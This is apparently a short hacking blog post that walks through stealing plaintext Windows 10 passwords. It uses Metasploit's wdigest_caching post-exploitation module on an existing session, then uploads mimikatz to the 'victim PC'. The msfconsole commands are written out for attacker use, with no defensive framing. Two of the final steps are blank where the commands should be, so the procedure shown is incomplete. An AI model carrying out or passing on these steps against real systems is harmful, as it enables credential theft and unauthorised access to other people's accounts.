Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider’s Registry key. Any subsequest logins will allow mimikatz to recover the plain text passwords from the system’s memory.

Exploit Targets

Windows 10


Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use post/windows/manage/wdigest_caching

msf exploit (wdigest_caching)>set session 1

msf exploit (wdigest_caching)>exploit

To send mimikatz file to the target system using following command

Upload /usr/share/mimikatz/x64/mimikatz.exe e:\\

Type the following command to check privilege


 Then type the following command to get users passwords in text mode.


Leave a Reply

Your email address will not be published. Required fields are marked *